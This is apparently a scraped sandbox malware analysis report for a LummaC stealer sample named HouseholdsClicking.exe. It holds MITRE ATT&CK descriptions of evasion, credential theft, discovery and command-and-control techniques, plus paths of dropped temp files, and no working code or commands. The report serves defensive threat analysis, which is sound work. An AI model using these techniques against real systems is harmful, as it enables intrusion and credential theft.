Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HouseholdsClicking.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\19152\Appliance.com

C:\Users\user\AppData\Local\Temp\19152\M

C:\Users\user\AppData\Local\Temp\Argentina

C:\Users\user\AppData\Local\Temp\Brothers

C:\Users\user\AppData\Local\Temp\Butt

C:\Users\user\AppData\Local\Temp\Distance

C:\Users\user\AppData\Local\Temp\Folding

C:\Users\user\AppData\Local\Temp\Gently

C:\Users\user\AppData\Local\Temp\Highways

C:\Users\user\AppData\Local\Temp\Highways.cmd

C:\Users\user\AppData\Local\Temp\Islam

Windows Analysis Report
HouseholdsClicking.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre